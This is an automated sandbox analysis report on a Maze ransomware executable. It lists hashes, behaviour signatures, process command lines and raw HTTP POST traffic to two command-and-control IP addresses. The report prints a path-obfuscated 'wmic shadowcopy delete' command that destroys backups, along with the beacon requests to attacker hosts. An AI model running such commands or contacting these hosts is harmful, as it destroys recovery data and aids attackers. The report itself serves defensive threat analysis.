Analysis

  • max time kernel: 150s
  • max time network: 146s
  • platform: windows10_x64
  • resource: win10
  • submitted: 24/06/2020, 13:14 UTC

General

  • Target: d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
  • Size: 351KB
  • MD5: 391370b48b8f64f86c628742b03de53a
  • SHA1: 0c4ef4daef2458ae999d2d3bf3ee837491369a25
  • SHA256: d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125
  • SHA512: 62527b56eb597c1a177f154793f0734ed3e54df7dfd36e619f07a44cee2e22190920fbd15d34a5c8fcdd54853cbad95a797c6fbadc0f5f19ddf25b13945b4adf

Malware Config

Signatures

  • Drops startup file (4 IoCs)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (87 IoCs)
  • Maze

    Ransomware family also known as ChaCha.

  • Modifies service (2 TTPs, 5 IoCs)
  • Reads user/profile data of web browsers (2 TTPs)

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of WriteProcessMemory (4 IoCs)
  • Deletes shadow copies (2 TTPs)

    Ransomware often targets backup files to inhibit system recovery.

  • Sets desktop wallpaper using registry (2 TTPs, 1 IoC)

Processes

  • C:\Users\Admin\AppData\Local\Temp\d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe"
    PID: 2728
    • Drops startup file
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Sets desktop wallpaper using registry
    Child processes:
    • C:\Windows\system32\wbem\wmic.exe
      Command line: "C:\e\..\Windows\lf\..\system32\owj\cdic\nngq\..\..\..\wbem\qdp\tard\..\..\wmic.exe" shadowcopy delete
      PID: 3016
      • Suspicious use of AdjustPrivilegeToken
    • C:\Windows\system32\wbem\wmic.exe
      Command line: "C:\wg\u\iymu\..\..\..\Windows\weokv\mouoy\vsg\..\..\..\system32\pe\lfwu\..\..\wbem\wbhic\..\wmic.exe" shadowcopy delete
      PID: 2988
      • Suspicious use of AdjustPrivilegeToken
  • C:\Windows\system32\vssvc.exe
    Command line: C:\Windows\system32\vssvc.exe
    PID: 3144
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service

Network

  • POST http://92.63.17.245/support/sjjydva.do?lk=vtkkm7&udf=65ig&ap=v246ub5j1&apno=w3w63b
    Process: d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    Remote address: 92.63.17.245:80
    Request:
    POST /support/sjjydva.do?lk=vtkkm7&udf=65ig&ap=v246ub5j1&apno=w3w63b HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
    Host: 92.63.17.245
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 214
    Connection: Keep-Alive
    Response:
    HTTP/1.1 302 Moved Temporarily
    Server: nginx
    Date: Wed, 24 Jun 2020 13:47:28 GMT
    Content-Type: text/html
    Content-Length: 138
    Location: http://92.63.17.245/?lk=vtkkm7&udf=65ig&ap=v246ub5j1&apno=w3w63b
    Connection: keep-alive
    Keep-Alive: timeout=20
  • POST http://92.63.32.55/check/prkvsjplsr.phtml?k=1xpbq0&kf=xf2
    Process: d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    Remote address: 92.63.32.55:80
    Request:
    POST /check/prkvsjplsr.phtml?k=1xpbq0&kf=xf2 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
    Host: 92.63.32.55
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 214
    Connection: Keep-Alive
    Response:
    HTTP/1.1 500 Internal Server Error
    Server: nginx
    Date: Wed, 24 Jun 2020 13:47:28 GMT
    Content-Type: text/html
    Content-Length: 186
    Connection: close
  • POST http://92.63.17.245/logout/transfer/yymdgpad.html?qvki=2ulx11&wsv=n3q7&cu=l5lc&g=5326572
    Process: d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    Remote address: 92.63.17.245:80
    Request:
    POST /logout/transfer/yymdgpad.html?qvki=2ulx11&wsv=n3q7&cu=l5lc&g=5326572 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
    Host: 92.63.17.245
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 49
    Connection: Keep-Alive
    Response:
    HTTP/1.1 302 Moved Temporarily
    Server: nginx
    Date: Wed, 24 Jun 2020 13:47:46 GMT
    Content-Type: text/html
    Content-Length: 138
    Location: http://92.63.17.245/?qvki=2ulx11&wsv=n3q7&cu=l5lc&g=5326572
    Connection: keep-alive
    Keep-Alive: timeout=20
  • POST http://92.63.32.55/support/support/k.shtml
    Process: d65fa9ed1220cfa12d22239ca62a4b5978bb613090fc1dcb0cccdf191151d125.exe
    Remote address: 92.63.32.55:80
    Request:
    POST /support/support/k.shtml HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
    Host: 92.63.32.55
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 49
    Connection: Keep-Alive
    Response:
    HTTP/1.1 500 Internal Server Error
    Server: nginx
    Date: Wed, 24 Jun 2020 13:47:46 GMT
    Content-Type: text/html
    Content-Length: 186
    Connection: close

MITRE ATT&CK Enterprise v6
